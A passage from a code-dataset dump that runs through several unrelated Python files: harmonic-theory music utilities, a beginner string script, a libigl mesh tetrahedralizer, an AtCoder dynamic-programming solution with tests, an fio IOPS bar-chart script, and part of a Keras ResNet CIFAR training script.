Basically trying to measure how often each point is visited,\n# relative to the entirety of the trajectory.\"\"\"\n# points = traj_to_points(unique=False)\n# _, cts = npi.unique(points, return_count=True)\n\n\ndef traj_decomposition(traj, show_unq=True, show_proportion=True):\n \"\"\"Returns the list of ordered subsets of the original trajectory, and (if\n required) the list of unique subsets of the trajectory.\"\"\"\n traj_inds = [i for i in range(len(traj))]\n decomp_index = []\n for i, end in enumerate(range(1, len(traj))[::-1]):\n steps = i + 2\n for step in range(steps):\n decomp_index.append(np.array(traj_inds[step: step + end]))\n decomp = [traj[i] for i in decomp_index]\n unq = unq_traj_decomp(decomp)\n prop = len(unq) /len(decomp)\n if show_unq and show_proportion:\n return decomp, unq, prop\n elif show_unq:\n return decomp, unq\n elif show_proportion:\n return decomp, prop\n else:\n return decomp\n\ndef unq_traj_decomp(decomp):\n \"\"\"Takes a decomp (list of subsets of trajectory) and returns the list of\n unique sub-trajectories that have been cast to ordinal.\"\"\"\n ord = [cast_traj_to_ordinal(i) for i in decomp]\n lens = list(set([len(i) for i in ord]))\n sb_groups = [npi.unique(np.array([i for i in ord if len(i) == j])) for j in lens]\n out = [i for i in itertools.chain.from_iterable(sb_groups)]\n return out\n\n\nclass NpEncoder(json.JSONEncoder):\n def default(self, obj):\n if isinstance(obj, np.integer):\n return int(obj)\n elif isinstance(obj, np.floating):\n return float(obj)\n elif isinstance(obj, np.ndarray):\n return obj.tolist()\n else:\n return super(NpEncoder, self).default(obj)\n\ndef tex_matrix_writer(matrix, path):\n out = '\\documentclass{article}\\n'\\\n '\\\\begin{document} $\\n'\\\n '\\\\left[\\n'\\\n '\\\\begin{array}'\n horiz = '|'.join(['c' for i in range(len(matrix))])\n out += '{' + horiz + '}\\n'\n for dim in range(np.shape(matrix)[-1]):\n out += ' & '.join([str(i) for i in matrix[:,dim]]) + ' \\\\\\\\\\n'\n out += '\\end{array}\\n'\\\n '\\\\right] $\\n'\\\n '\\end{document}'\n with open(path, 'w') as file:\n file.write(out)\n\n\ndef max_possible_roots(size, dims):\n \"\"\"Given the number of points in a collection and dimensions of harmonic\n space it occupies, returns the maximum possible number of roots (or,\n extremities), assuming dims is 2 or more.\"\"\"\n layers = math.floor(math.log(1 - size * (1 - dims), dims))\n roots = dims ** layers\n pts_left = size - (1 - roots) / (1 - dims)\n add = pts_left - int(np.ceil(pts_left / dims))\n roots += add\n return roots\n\ndef possible_paths(A, B):\n \"\"\"Given two points in the same dimensionality, where A contains B, return\n all of the possible paths from A to B (not including the endpoints).\"\"\"\n test = is_contained_by(B, A)\n if not test:\n print('error!!')\n diff = B - A\n moves = []\n for i, steps in enumerate(diff):\n for step in range(steps):\n moves.append(i)\n permutations = list(set(itertools.permutations(moves)))\n paths = []\n for perm in permutations:\n path = A.reshape((1, *np.shape(A)))\n for move in perm:\n next_point = path[-1] + np.eye(np.shape(A)[-1], dtype=int)[move]\n next_point = next_point.reshape((1, *np.shape(next_point)))\n path = np.concatenate((path, next_point))\n paths.append(path[1:-1])\n return paths\n\n\n# possible_paths(np.array((0, 0, 0)), np.array((2, 1, 0)))\n\ndef get_connected_indexes(points):\n # first, are they all connected? if so, connected_indexes will have one\n # list in it, containing all tones. 
If not, connected indexes will have\n # a seperate list for each subset of tones that are connected via adjacency.\n indexes = np.arange(len(points))\n connected_indexes = []\n outer_ct = 0\n out_size = 0\n while out_size < np.shape(points)[0]:\n accounted_for = list(itertools.chain.from_iterable(connected_indexes))\n not_yet_accounted_for = indexes[np.invert(np.isin(indexes, accounted_for))]\n connected_indexes.append([not_yet_accounted_for[0]])\n ct = 0\n while ct < len(connected_indexes[outer_ct]):\n pt = points[connected_indexes[outer_ct][ct]]\n adjacencies = np.nonzero(np.sum(np.abs(pt - points), axis=1) == 1)[0]\n add_adjacencies = [i for i in adjacencies if i not in connected_indexes[outer_ct]]\n if len(add_adjacencies) > 0:\n for aa in add_adjacencies:\n connected_indexes[outer_ct].append(aa)\n ct += 1\n outer_ct += 1\n out_size = len(list(i for i in itertools.chain.from_iterable(connected_indexes)))\n return connected_indexes\n\n\ndef least_common_containee(A, B):\n \"\"\"For points A and B, return the simplest (lowest manhattan distance from\n origin) point that both points contain.\"\"\"\n set = np.array((A, B))\n out = np.max(set, axis=0)\n return out\n\n# test = np.array(((1, 0), (0, 1)))\n# least_common_containee(*test)\n\ndef fix_collection(points):\n \"\"\"For a collection of tones, assess if it is a 'neighborhood'—-that all\n points are connected by adjacency. If so, return the points and an array\n filled with ones, indicating that its a normal 'chord'. If not, finds\n 'holes', adds them to the list of points, and returns an array with 1s for\n real tones, and 0s for 'holes', or 'ghost' tones.\"\"\"\n\n connected_indexes = get_connected_indexes(points)\n\n if len(connected_indexes) == 1:\n return points, np.zeros(len(points)) + 1\n else:\n # check each subset of tones against the other subsets for containments.\n # If there are containments, add all possible path points as potential\n # holes.\n combs = itertools.combinations(np.arange(len(connected_indexes)), 2)\n potential_holes = []\n for comb in combs:\n n_A = points[connected_indexes[comb[0]]]\n n_B = points[connected_indexes[comb[1]]]\n trials = cartesian_product(np.arange(len(n_A)), np.arange(len(n_B)))\n crs = [containment_relationship(n_A[t[0]], n_B[t[1]]) for t in trials]\n for i, cr in enumerate(crs):\n if cr != 0:\n if cr == 1:\n start = n_A[trials[i][0]]\n end = n_B[trials[i][1]]\n if cr == 2:\n start = n_B[trials[i][1]]\n end = n_A[trials[i][0]]\n pps = possible_paths(start, end)\n pps_ = np.concatenate(pps)\n if len(pps_) > 0:\n if len(potential_holes) == 0:\n potential_holes = pps_\n else:\n potential_holes = np.concatenate((potential_holes, pps_))\n unique, counts = npi.unique(potential_holes, return_count=True)\n sorted_unique = unique[np.argsort(counts)[::-1]]\n if len(sorted_unique) == 0:\n pot_holes = []\n else:\n pot_holes = sorted_unique[np.invert(npi.contains(points, sorted_unique))]\n\n # now try each 'pot_hole' (potential hole) to see if adding it to the\n # collection individually would bring all into one neighborhood. If none\n # can do alone, try every set of two, then every set of three, etc., all\n # the way up until you trying all pot holes altogether. If you can't\n # bring all together with the pot holes, bring together as many as\n # possible with as few as possible additions. 
From that point, you'll\n # have to find the simplest possible 'common hole' that would be contained\n # by the remaining sets ...\n pot_solutions = []\n for num_add_tones in range(1, len(pot_holes) + 1):\n if num_add_tones == 1:\n for i, ph in enumerate(pot_holes):\n add_set = np.concatenate((points, np.expand_dims(ph, 0)))\n ci = get_connected_indexes(add_set)\n pot_solutions.append((np.array(i), len(ci)))\n else:\n combs = itertools.combinations(range(len(pot_holes)), num_add_tones)\n for comb in combs:\n adds = pot_holes[np.array(comb)]\n add_set = np.concatenate((points, adds))\n ci = get_connected_indexes(add_set)\n pot_solutions.append((comb, len(ci)))\n sorts = np.argsort([ps[1] for ps in pot_solutions], kind='stable')\n if len(pot_solutions) > 0:\n if pot_solutions[sorts[0]][1] == 1:\n add = np.array(pot_solutions[sorts[0]][0])\n add_pts = pot_holes[add]\n if add_pts.ndim != points.ndim:\n add_pts = np.expand_dims(add_pts, 0)\n full_pts = np.concatenate((points, add_pts))\n ones = np.zeros(len(points), dtype=int) + 1\n if len(np.shape(add)) == 0:\n zeros = np.zeros(1, dtype=int)\n else:\n zeros = np.zeros(len(add), dtype=int)\n hole_array = np.concatenate((ones, zeros))\n return full_pts, hole_array\n else:\n add = np.array(pot_solutions[sorts[0]][0])\n add_pts = pot_holes[add]\n if add_pts.ndim == 1:\n add_pts = np.expand_dims(add_pts, 0)\n temp_full_pts = np.concatenate((points, add_pts))\n connected_indexes = get_connected_indexes(temp_full_pts)\n\n else:\n add_pts = []\n\n if 'temp_full_pts' not in locals():\n temp_full_pts = points\n\n combs = itertools.combinations(np.arange(len(connected_indexes)), 2)\n for comb in combs:\n lccs = []\n # print(points, connected_indexes, comb)\n n_A = temp_full_pts[connected_indexes[comb[0]]]\n n_B = temp_full_pts[connected_indexes[comb[1]]]\n trials = cartesian_product(np.arange(len(n_A)), np.arange(len(n_B)))\n for t in trials:\n lcc = least_common_containee(n_A[t[0]], n_B[t[1]])\n lccs.append(lcc)\n min_ind = np.argmin([np.sum(i) for i in lccs])\n A = n_A[trials[min_ind][0]]\n B = n_B[trials[min_ind][1]]\n lcc = lccs[min_ind]\n path_from_A = possible_paths(A, lcc)[0]\n path_from_B = possible_paths(B, lcc)[0]\n adds = np.concatenate((np.expand_dims(lcc, 0), path_from_A, path_from_B))\n if len(add_pts) == 0:\n add_pts = adds\n else:\n add_pts = np.concatenate((add_pts, adds))\n add_pts = npi.unique(add_pts)\n full_pts = np.concatenate((temp_full_pts, add_pts))\n ones = np.zeros(len(points), dtype=int) + 1\n zeros = np.zeros(len(full_pts) - len(points), dtype=int)\n hole_array = np.concatenate((ones, zeros))\n return full_pts, hole_array\n # currently doesn't work when there are three seperate groups, in second category,\n # and you only have to connect a to b and b to c; not also c to a\n\n\ndef get_layers(points):\n \"\"\"For a 3d collection of tones, splits the points into layers. 
Returns a\n list of lists of coordinates, one list for each layer.\"\"\"\n\n # first split into layers\n sums = np.sum(points, axis=1)\n max_layer = np.max(sums)\n layers = [points[sums==layer] for layer in range(max_layer+1)]\n return layers\n\ndef get_layer_skew(points):\n \"\"\"Given a 3d collection of tones, return a array of arrays, one for each\n layer, that describes the relative skew of that layer toward each dimension.\"\"\"\n layers = get_layers(points)\n skew=[]\n for i, layer in enumerate(layers):\n sk = np.sum(layer, axis=0)\n if np.sum(sk) != 0:\n sk = sk / np.sum(sk)\n skew.append(sk)\n return(np.array(skew))\n\n\ndef root_salience(points, scaled=True, indexes=False):\n \"\"\"Given a chord / neighborhood, return the roots, the number of tones\n that each root contains, and (if indexes==True), the indexes of each root.\n By default, the 'weight' of each root is scaled by dividing by the total\n number of non-root points.\"\"\"\n\n roots = points[are_roots(points)]\n non_roots = points[np.invert(are_roots(points))]\n weight = []\n for r in roots:\n ct = 0\n for nr in non_roots:\n if is_contained_by(nr, r):\n ct += 1\n weight.append(ct)\n if scaled:\n weight = [i/len(non_roots) for i in weight]\n if indexes:\n return roots, weight, np.nonzero(are_roots(points))[0]\n else:\n return roots, weight\n\n\ndef dc_alg_step(size, counts=None, alpha=1.0):\n \"\"\"Performs a single iteration of James Tenney's Dissonant Counterpoint\n Algorithm. Randomly chooses an index from range(size) with weights based on\n the previous 'counts'. The process starts off with counts all = 1. Each time\n an element is chosen, its count goes down to 1. Each time an element is not\n chosen, its count is incremented up by one.\n\n Parameters:\n size (integer): the number of elements to choose between.\n counts (array of ints >= 1): the counts of each element.\n alpha (float): the 'sharpness' of the weighting.\n\n \"\"\"\n if np.all(counts == None):\n counts = np.zeros(size, dtype=int) + 1\n\n weight = counts**alpha\n p = weight / np.sum(weight)\n choice_index = np.random.choice(np.arange(size), p=p)\n counts += 1\n counts[choice_index] = 1\n return choice_index, counts\n\n\ndef dc_alg(size, epochs, counts=None, alpha=1.0, return_counts=False):\n \"\"\"Iterates through multiple dc_alg_steps, returning the list of element\n indexes, and (if requested) the number of counts at the end.\n\n Parameters:\n size (integer): the number of elements to choose between.\n counts (array of ints >= 1): the counts of each element.\n alpha (float > 0.0): the 'sharpness' of the weighting.\n epochs (integer): the number of times to iterate through the dc_alg.\"\"\"\n\n choices = []\n for e in range(epochs):\n choice, counts = dc_alg_step(size, counts, alpha)\n choices.append(choice)\n choices = np.array(choices)\n if return_counts:\n return choices, counts\n else:\n return choices\n\n\ndef group_dc_alg_step(groups, group_counts=None, element_counts=None, alpha=1.0):\n \"\"\"dc_alg, but for groups of elements.\n\n Parameters:\n groups (array of nested arrays, each filled with ints)\n \"\"\"\n if np.all(group_counts == None):\n group_counts = np.zeros(len(groups), dtype=int) + 1\n if np.all(element_counts == None):\n element_counts = np.zeros(np.max(flatten(groups))+1, dtype=int) + 1\n\n # avg of element counts for each group\n group_avg_ec = []\n for group in groups:\n avg = np.mean([element_counts[i] for i in group])\n group_avg_ec.append(avg)\n group_avg_ec = np.array(group_avg_ec)\n weight = group_counts * group_avg_ec\n p = 
weight/ np.sum(weight)\n choice_index = np.random.choice(np.array(len(groups)), p=p)\n choice = groups[choice_index]\n group_counts += 1\n group_counts[choice_index] = 1\n element_counts += 1\n for i in choice:\n element_counts[i] = 1\n return choice_index, group_counts, element_counts\n\ndef group_dc_alg(groups, epochs, group_counts=None, element_counts=None,\n alpha=1.0, return_counts=False):\n cis = []\n gc = group_counts\n ec = element_counts\n for e in range(epochs):\n choice_index, gc, ec = group_dc_alg_step(groups, gc, ec, alpha)\n cis.append(choice_index)\n if return_counts:\n return [groups[i] for i in cis], gc, ec\n else:\n return [groups[i] for i in cis]\n\n\n# def group_member_dc_alg_step(groups, )\n\ndef make_random_trajectory(length, max_step=1, dims=3, circular=True):\n \"\"\"\n\n parameters:\n length (integer, if circular==True, must be even)\n\n \"\"\"\n steps = np.zeros((length, dims), dtype=int)\n indexes = np.random.randint(dims, size=length)\n steps[np.arange(length), indexes] = np.random.randint(-1, 2, size=length)\n if circular == True:\n mirror = -1 * steps[:int(length/2)]\n np.random.shuffle(mirror)\n steps[int(length/2):] = mirror\n return steps\n\n\ndef traj_to_absolute(traj):\n origin = np.zeros(shape=(1, np.shape(traj)[-1]), dtype=int)\n return np.concatenate(((origin), np.cumsum(traj, axis=0)))\n\n\ndef hsv_to_freq(hsv, primes, fund, oct=(0, 0, 0)):\n oct = np.array(oct)\n if len(np.shape(hsv)) == 2:\n # print(hsv)\n sub_prod = (primes ** hsv) * (2.0 ** (hsv * oct))\n freq = fund * np.prod(sub_prod, axis=1)\n elif len(np.shape(hsv)) == 3:\n sub_prod = (primes ** hsv) * (2.0 ** (hsv * oct))\n freq = fund * np.prod(sub_prod, axis=2)\n\n else:\n freq = fund * np.prod((primes ** hsv) * (2.0 ** (hsv * oct)))\n return freq\n\ndef hsv_to_gen_ratios(hsv, primes):\n \"\"\"For a list of tones specified as harmonic series vectors, return the\n associated octave-generalized ratios.\"\"\"\n out = np.prod(primes ** hsv, axis=1)\n while np.any(out < 1) or np.any(out >= 2):\n out = np.where(out < 1, out * 2, out)\n out = np.where(out >=2, out / 2, out)\n return out\n\n\n\ndef octave_finder(chord, fund, primes, lims=(50, 50*(2**5)), max_width=False):\n \"\"\"Returns all of the possible octave shifts that would make the notes in\n the chord audible.\"\"\"\n bit = np.arange(-4, 4)\n cp = cartesian_product(*(bit for i in range(np.shape(chord)[-1])))\n seive = np.zeros(len(cp), dtype=bool)\n freq_ranges=[]\n for i, oct in enumerate(cp):\n freq = hsv_to_freq(chord, primes, fund, oct)\n min_freq = np.min(freq)\n max_freq = np.max(freq)\n freq_ranges.append(max_freq - min_freq)\n if np.all(min_freq >= lims[0]) and np.all(max_freq <= lims[1]):\n seive[i] = True\n possible_octs = cp[seive]\n freq_ranges = np.array(freq_ranges)\n freq_ranges = freq_ranges[seive]\n if max_width:\n return possible_octs, freq_ranges\n else:\n return possible_octs\n\n# timbre tools\n\ndef fill_in_octaves(freqs, max_freq=None, as_harms=False):\n \"\"\"For an array of frequencies, return an array will the original array plus\n all octave multiples of each that are less than the maximum frequency.\"\"\"\n if max_freq == None:\n max_freq = np.max(freqs)\n out = []\n for freq in freqs:\n ct = 0\n while freq * (2 ** ct) <= max_freq:\n out.append(freq * (2 ** ct))\n ct += 1\n out = np.array(out)\n if as_harms:\n partials = np.arange(1, max_freq + 1)\n truth = npi.contains(out, partials)\n return truth.astype(int)\n else:\n return 
out\n","repo_name":"jon-myers/Harmonic_Theory","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":56499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"9592621921","text":"f_name = \"Pontius\"\nl_name = \"Pilate\"\n\n# Logic\nfull_name = f_name + \" \" + l_name\n\n# define the function\ndef get_full_name(first_name: str, last_name: str) -> str:\n full_name = first_name + \" \" + last_name\n return full_name\n\n\ndef print_name(name: str) -> None:\n with open(\"names.txt\", \"a\") as file:\n file.write(name + \"\\n\")\n print(name)\n\n\nprint(full_name)\nprint(\"================================\")\n\n# usage of the function\nresult = get_full_name(\"Joe\", \"Mafia\")\nprint_name(result)\n","repo_name":"neotechmonk/py-face","sub_path":"goog_crash_course/w2_expressions.py","file_name":"w2_expressions.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"5201304439","text":"#!/usr/bin/env python3\n\nimport sys, os, pathlib\nsys.path.append(str(pathlib.Path.home().joinpath('bin')))\nsys.path.append(os.getcwd())\n\nimport py11igl as igl\nimport argparse\nimport numpy as np\n\ndef main():\n p = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n p.add_argument('file', help='Files to tet')\n p.add_argument('-o', help='output npz file', required=True)\n p.add_argument('--scale', help='Scale applied to the mesh', default=1.0, type=float)\n args = p.parse_args()\n\n inV, inF = igl.loadOBJ(args.file)\n V, T, F = igl.tet(inV, inF, 1.0)\n np.savez(args.o, V=V, T=T, F=F)\n\nif __name__ == '__main__':\n main()\n","repo_name":"xinyazhang/igl_utils","sub_path":"python/tetobj.py","file_name":"tetobj.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"16589295628","text":"import sys\nfrom io import StringIO\nimport unittest\n\nclass TestClass(unittest.TestCase):\n maxDiff = None\n def assertIO(self, input, output):\n stdout, stdin = sys.stdout, sys.stdin\n sys.stdout, sys.stdin = StringIO(), StringIO(input)\n resolve()\n sys.stdout.seek(0)\n out = sys.stdout.read()[:-1]\n sys.stdout, sys.stdin = stdout, stdin\n self.assertEqual(out, output)\n\n def test_Sample_Input_1(self):\n input = \"\"\"3 4 2\n1 7 7 9\n9 6 3 7\n7 8 6 4\"\"\"\n output = \"\"\"10\"\"\"\n self.assertIO(input, output)\n\n def test_Sample_Input_2(self):\n input = \"\"\"3 3 1000000000\n1000000 1000000 1\n1000000 1000000 1000000\n1 1000000 1000000\"\"\"\n output = \"\"\"1001000001\"\"\"\n self.assertIO(input, output)\n\ndef resolve():\n # (i, j) を終点だとすると、上から遷移してくる場合と左から遷移してくる場合しかない。\n # 終点は駅があっても線路を引くと考える。\n # 上と左が線路の時と始点の時で考えることが異なる。\n # 遷移してきた場所が始点の場合、A[i-1][j] か A[i][j-1] + C が (i, j) まで線路を引くコストになる。\n # 遷移してきた場所が線路の場合、そこまでのコストの最小値 + C が (i, j) まで線路を引くコストになる。\n # dp[i][j] = dp[i-1][j] or dp[i][j-1] から遷移してきたときの最小コストを解く\n # ↑ だと左上から右下への遷移しかわからないので困る。\n # 上下反転して同じことをする。\n inf = 10**30+1\n H, W, C = map(int, input().split(\" \"))\n A = [[int(x) for x in input().split(\" \")]+[inf] for _ in range(H)]+[[inf]*(W+1)]\n dp = [[0]*W+[inf] for _ in range(H)]+[[inf]*(W+1)]\n dp[0][0] = A[0][0]\n ans = inf\n for h in range(H):\n for w in range(W):\n if h == 0 and w == 0: continue\n dp[h][w] = min(A[h-1][w], dp[h-1][w], A[h][w-1], dp[h][w-1])+C\n ans = min(ans, dp[h][w]+A[h][w])\n\n # 上下反転\n dp = [[0]*W+[inf] for _ in 
range(H)]+[[inf]*(W+1)]\n dp[H-1][0] = A[H-1][0]\n for h in reversed(range(H)):\n for w in range(W):\n if h == H-1 and w == 0: continue\n dp[h][w] = min(A[h+1][w], dp[h+1][w], A[h][w-1], dp[h][w-1])+C\n ans = min(ans, dp[h][w]+A[h][w])\n print(ans)\n\nimport sys\nif sys.argv[-1] == './Main.py':\n resolve()\n\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"TsukasaDEKA/competitive_programing","sub_path":"atcoder/current/ABC/201_300/210/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"32463025982","text":"\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\nimport numpy as np\n\n# _w = write iops\n# _r = read iops\n\n\nx = np.arange(1,8)\nx_labels=[\"1\", \"2\", \"4\", \"8\", \"16\", \"32\", \"64\"]\n#pod\ny1_r=[979, 1893, 3030, 4078, 5129, 6063, 7022 ]\ny1_w=[418, 809, 1299, 1749, 2199, 2600, 3011 ]\n\n\n#host\n\n#y2_w=[2884,2727,2541,1468,761]\n#y2_r=[6724,6367,5886,3437,1761]\ny2_r=[951, 1843, 3034, 4170, 5203, 6129, 6915]\ny2_w=[406, 789, 1301, 1788, 2231, 2628, 2965]\n\n\n#plt.plot(x, y2_r, 'r-', x, y2_w, 'b-' )\n\nplt.bar(x-0.125, y2_w, color='r', width = 0.25)\nplt.bar(x+0.125, y1_w, color='b', width = 0.25)\n\nplt.title(\"Fio Test on RBD: IOdepth vs Write IOPS\")\nplt.ylabel('Write IOPS')\nplt.xlabel('Rammp time')\nplt.xticks(x, x_labels)\n\nred_patch = mpatches.Patch(color='red', label='Host')\nblue_patch = mpatches.Patch(color='blue', label='Pod')\nplt.legend(handles=[red_patch,blue_patch])\n\n\nplt.savefig('rbd_depth_write')\nplt.show()\n\nplt.bar(x-0.125, y2_r, color='r', width = 0.25)\nplt.bar(x+0.125, y1_r, color='b', width = 0.25)\n\nplt.title(\"Fio Test on RBD: IOdepth vs Read IOPS \")\nplt.ylabel('Read IOPS')\nplt.xlabel('Ramp time')\nplt.xticks(x, x_labels)\n\nred_patch = mpatches.Patch(color='red', label='Host')\nblue_patch = mpatches.Patch(color='blue', label='Pod')\nplt.legend(handles=[red_patch,blue_patch])\n\n\nplt.savefig('rbd_depth_read')\nplt.show()\n\n","repo_name":"gemoya/memoria_exp","sub_path":"plot/rbd_depth.py","file_name":"rbd_depth.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"31474488643","text":"from __future__ import print_function\nimport keras\nfrom keras.layers import Dense, Conv2D, BatchNormalization, Activation\nfrom keras.layers import AveragePooling2D, Input, Flatten\nfrom keras.optimizers import Adam\nfrom keras.callbacks import ModelCheckpoint, LearningRateScheduler\nfrom keras.callbacks import ReduceLROnPlateau\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.regularizers import l2\nfrom keras import backend as K\nfrom keras.models import Model\nfrom keras.models import load_model\nfrom keras.datasets import cifar10, cifar100\nimport numpy as np\nimport os\nimport logging\nimport sys\nimport io\nfrom keras.utils.vis_utils import plot_model\nfrom Compression_TO import Compression_Main\nfrom Extras import RAS\n\n#https://machinelearningmastery.com\n\n#b_s = 32, epochs = 200, data_augemtation = true, num_classes = 10 (CIFAR10), substract_pixel_mean = true\ndef training_parameters(batch_size, epochs, data_augmentation, num_classes, substract_pixel_mean):\n bs = batch_size\n ep = epochs\n da = data_augmentation\n nc = num_classes\n spm = substract_pixel_mean\n #0 #1 #2 #3 #4\n return bs, ep, da, nc, spm\n\n#loads Data - need to add other data load options ( & 
Imagenet!)\ndef data(dataset, settings):\n num_classes = settings[3]\n subtract_pixel_mean = settings[4]\n # Load the CIFAR10 data.\n if dataset == 10:\n (x_train, y_train), (x_test, y_test) = cifar10.load_data()\n\n if dataset == 100:\n (x_train, y_train), (x_test, y_test) = cifar100.load_data()\n\n\n # Input image dimensions.\n input_shape = x_train.shape[1:]\n\n # Normalize data.\n x_train = x_train.astype('float32') / 255\n x_test = x_test.astype('float32') / 255\n\n # If subtract pixel mean is enabled\n if subtract_pixel_mean:\n x_train_mean = np.mean(x_train, axis=0)\n x_train -= x_train_mean\n x_test -= x_train_mean\n\n print('x_train shape:', x_train.shape)\n print(x_train.shape[0], 'train samples')\n print(x_test.shape[0], 'test samples')\n print('y_train shape:', y_train.shape)\n\n # Convert class vectors to binary class matrices.\n y_train = keras.utils.to_categorical(y_train, num_classes)\n y_test = keras.utils.to_categorical(y_test, num_classes)\n #0 #1 #2 #3 #4 #5 #6\n return x_train, y_train, x_test, y_test, x_train_mean, input_shape, dataset\n\n#learning rate, input the parameters function\ndef lr_schedule(epoch):\n \"\"\"Learning Rate Schedule\n\n Learning rate is scheduled to be reduced after 80, 120, 160, 180 epochs.\n Called automatically every epoch as part of callbacks during training.\n\n # Arguments\n epoch (int): The number of epochs\n\n # Returns\n lr (float32): learning rate\n \"\"\"\n\n lr = 1e-3\n if epoch > 180:\n lr *= 0.5e-3\n elif epoch > 160:\n lr *= 1e-3\n elif epoch > 120:\n lr *= 1e-2\n elif epoch > 80:\n lr *= 1e-1\n print('Learning rate: ', lr)\n return lr\n\ndef resnet_layer(inputs,\n num_filters=16,\n kernel_size=3,\n strides=1,\n activation='relu',\n batch_normalization=True,\n conv_first=True):\n \"\"\"2D Convolution-Batch Normalization-Activation stack builder\n\n # Arguments\n inputs (tensor): input tensor from input image or previous layer\n num_filters (int): Conv2D number of filters\n kernel_size (int): Conv2D square kernel dimensions\n strides (int): Conv2D square stride dimensions\n activation (string): activation name\n batch_normalization (bool): whether to include batch normalization\n conv_first (bool): conv-bn-activation (True) or\n bn-activation-conv (False)\n\n # Returns\n x (tensor): tensor as input to the next layer\n \"\"\"\n\n # Model parameter\n # ----------------------------------------------------------------------------\n # | | 200-epoch | Orig Paper| 200-epoch | Orig Paper| sec/epoch\n # Model | n | ResNet v1 | ResNet v1 | ResNet v2 | ResNet v2 | GTX1080Ti\n # |v1(v2)| %Accuracy | %Accuracy | %Accuracy | %Accuracy | v1 (v2)\n # ----------------------------------------------------------------------------\n # ResNet20 | 3 (2)| 92.16 | 91.25 | ----- | ----- | 35 (---)\n # ResNet32 | 5(NA)| 92.46 | 92.49 | NA | NA | 50 ( NA)\n # ResNet44 | 7(NA)| 92.50 | 92.83 | NA | NA | 70 ( NA)\n # ResNet56 | 9 (6)| 92.71 | 93.03 | 93.01 | NA | 90 (100)\n # ResNet110 |18(12)| 92.65 | 93.39+-.16| 93.15 | 93.63 | 165(180)\n # ResNet164 |27(18)| ----- | 94.07 | ----- | 94.54 | ---(---)\n # ResNet1001| (111)| ----- | 92.39 | ----- | 95.08+-.14| ---(---)\n # ---------------------------------------------------------------------------\n conv = Conv2D(num_filters,\n kernel_size=kernel_size,\n strides=strides,\n padding='same',\n kernel_initializer='he_normal',\n kernel_regularizer=l2(1e-4))\n\n x = inputs\n if conv_first:\n x = conv(x)\n if batch_normalization:\n x = BatchNormalization()(x)\n if activation is not None:\n x = 
Activation(activation)(x)\n else:\n if batch_normalization:\n x = BatchNormalization()(x)\n if activation is not None:\n x = Activation(activation)(x)\n x = conv(x)\n return x\n\n\ndef resnet_v1(n, data):\n \"\"\"ResNet Version 1 Model builder [a]\n\n Stacks of 2 x (3 x 3) Conv2D-BN-ReLU\n Last ReLU is after the shortcut connection.\n At the beginning of each stage, the feature map size is halved (downsampled)\n by a convolutional layer with strides=2, while the number of filters is\n doubled. Within each stage, the layers have the same number filters and the\n same number of filters.\n Features maps sizes:\n stage 0: 32x32, 16\n stage 1: 16x16, 32\n stage 2: 8x8, 64\n The Number of parameters is approx the same as Table 6 of [a]:\n ResNet20 0.27M\n ResNet32 0.46M\n ResNet44 0.66M\n ResNet56 0.85M\n ResNet110 1.7M\n\n # Arguments\n input_shape (tensor): shape of input image tensor\n depth (int): number of core convolutional layers\n num_classes (int): number of classes (CIFAR10 has 10)\n\n # Returns\n model (Model): Keras model instance\n \"\"\"\n depth = n * 6 + 2\n input_shape = data[5]\n num_classes = data[6]\n if (depth - 2) % 6 != 0:\n raise ValueError('depth should be 6n+2 (eg 20, 32, 44 in [a])')\n\n # Start model definition.\n num_filters = 16\n num_res_blocks = int((depth - 2) / 6)\n\n inputs = Input(shape=input_shape)\n x = resnet_layer(inputs=inputs)\n # Instantiate the stack of residual units\n for stack in range(3):\n for res_block in range(num_res_blocks):\n strides = 1\n if stack > 0 and res_block == 0: # first layer but not first stack\n strides = 2 # downsample\n y = resnet_layer(inputs=x,\n num_filters=num_filters,\n strides=strides)\n y = resnet_layer(inputs=y,\n num_filters=num_filters,\n activation=None)\n if stack > 0 and res_block == 0: # first layer but not first stack\n # linear projection residual shortcut connection to match\n # changed dims\n x = resnet_layer(inputs=x,\n num_filters=num_filters,\n kernel_size=1,\n strides=strides,\n activation=None,\n batch_normalization=False)\n x = keras.layers.add([x, y])\n x = Activation('relu')(x)\n num_filters *= 2\n\n # Add classifier on top.\n # v1 does not use BN after last shortcut connection-ReLU\n x = AveragePooling2D(pool_size=8)(x)\n y = Flatten()(x)\n outputs = Dense(num_classes,\n activation='softmax',\n kernel_initializer='he_normal')(y)\n\n # Instantiate model.\n model = Model(inputs=inputs, outputs=outputs)\n return model\n\n\ndef resnet_v2(n, data):\n \"\"\"ResNet Version 2 Model builder [b]\n\n Stacks of (1 x 1)-(3 x 3)-(1 x 1) BN-ReLU-Conv2D or also known as\n bottleneck layer\n First shortcut connection per layer is 1 x 1 Conv2D.\n Second and onwards shortcut connection is identity.\n At the beginning of each stage, the feature map size is halved (downsampled)\n by a convolutional layer with strides=2, while the number of filter maps is\n doubled. 
